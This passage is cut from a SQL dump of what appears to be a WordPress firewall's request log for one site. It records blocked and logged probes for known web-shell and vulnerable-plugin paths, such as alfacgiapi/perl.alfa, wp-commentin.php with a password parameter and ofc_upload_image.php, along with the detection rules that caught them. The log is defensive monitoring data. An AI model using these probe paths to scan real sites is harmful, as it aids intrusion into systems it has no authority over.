User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11902,1674462356.524230,1674462356.393200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11903,1674470541.123764,1674470539.851900,'\0\0\0\0\0\0\0\0\0\0���s�',0,403,0,0,0,'https://dailyjolly.co.uk/2000/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwMDAvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11904,1674486357.073501,1674486356.945200,'\0\0\0\0\0\0\0\0\0\0��]��2',0,403,0,0,0,'https://dailyjolly.co.uk/2001/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwMDEvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11905,1674502227.117355,1674502226.975300,'\0\0\0\0\0\0\0\0\0\0��b��',0,403,0,0,0,'https://dailyjolly.co.uk/2002/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwMDIvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11906,1674517697.175966,1674517697.036600,'\0\0\0\0\0\0\0\0\0\0��ij`�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mYW5jeS1wcm9kdWN0LWRlc2lnbmVyL2luYy9jdXN0b20taW1hZ2UtaGFuZGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11907,1674518301.350462,1674518301.165400,'\0\0\0\0\0\0\0\0\0\0��P���',0,403,0,0,0,'https://dailyjolly.co.uk/2003/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwMDMvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11908,1674530669.370041,1674530669.189800,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21famluYy9jbGFzc2VzL2dyYXBoaWNzL3BocC1vZmMtbGlicmFyeS9vZmNfdXBsb2FkX2ltYWdlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11909,1674534623.742880,1674534623.617200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://dailyjolly.co.uk/2004/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwMDQvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11910,1674541750.241207,1674541750.106300,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpputty/wpputty.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHB1dHR5L3dwcHV0dHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11911,1674541772.375664,1674541772.268900,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpyii2/wpyii2.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHlpaTIvd3B5aWkyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11912,1674541802.596093,1674541802.463700,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpzip/wpzip.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHppcC93cHppcC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11913,1674548334.122433,1674548334.014000,'\0\0\0\0\0\0\0\0\0\0��h�+\'',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11914,1674548333.943425,1674548333.832800,'\0\0\0\0\0\0\0\0\0\0��h�+\'',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11915,1674548333.761611,1674548333.646400,'\0\0\0\0\0\0\0\0\0\0��h�+\'',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11916,1674548333.697862,1674548333.583900,'\0\0\0\0\0\0\0\0\0\0��h�+\'',0,403,0,0,0,'https://dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11917,1674548333.575847,1674548333.461500,'\0\0\0\0\0\0\0\0\0\0��h�+\'',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11918,1674548333.363958,1674548333.201200,'\0\0\0\0\0\0\0\0\0\0��h�+\'',0,403,0,0,0,'https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11919,1674548333.319580,1674548333.188500,'\0\0\0\0\0\0\0\0\0\0��h�+\'',0,403,0,0,0,'https://dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11920,1674561175.457050,1674561175.328800,'\0\0\0\0\0\0\0\0\0\0���/�:',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt','www.google.com','Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11921,1674561175.456925,1674561175.328800,'\0\0\0\0\0\0\0\0\0\0���/�:',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt','www.google.com','Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11922,1674561187.157459,1674561187.037900,'\0\0\0\0\0\0\0\0\0\0���/�:',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt','www.google.com','Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11923,1674561187.157342,1674561187.037900,'\0\0\0\0\0\0\0\0\0\0���/�:',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt','www.google.com','Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11924,1674567749.595075,1674567749.186300,'\0\0\0\0\0\0\0\0\0\0��޽�',0,403,0,0,0,'https://dailyjolly.co.uk/2006/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwMDYvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11925,1674572019.476089,1674572019.351600,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-seo-spy-google/ofc/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zZW8tc3B5LWdvb2dsZS9vZmMvcGhwLW9mYy1saWJyYXJ5L29mY191cGxvYWRfaW1hZ2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11926,1674573327.837836,1674573327.705100,'\0\0\0\0\0\0\0\0\0\0���/�:',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11927,1674576606.354009,1674576606.225700,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpzip/wpzip.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHppcC93cHppcC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11928,1674576566.794331,1674576566.653500,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpyii2/wpyii2.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHlpaTIvd3B5aWkyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11929,1674576538.596753,1674576538.470900,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpputty/wpputty.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHB1dHR5L3dwcHV0dHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11930,1674584494.461278,1674584494.302300,'\0\0\0\0\0\0\0\0\0\0��T�Wu',0,403,0,0,0,'https://dailyjolly.co.uk/2007/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzIwMDcvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11931,1674601277.071306,1674601276.940400,'\0\0\0\0\0\0\0\0\0\0��܇x�',0,403,0,0,0,'https://dailyjolly.co.uk/3/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious 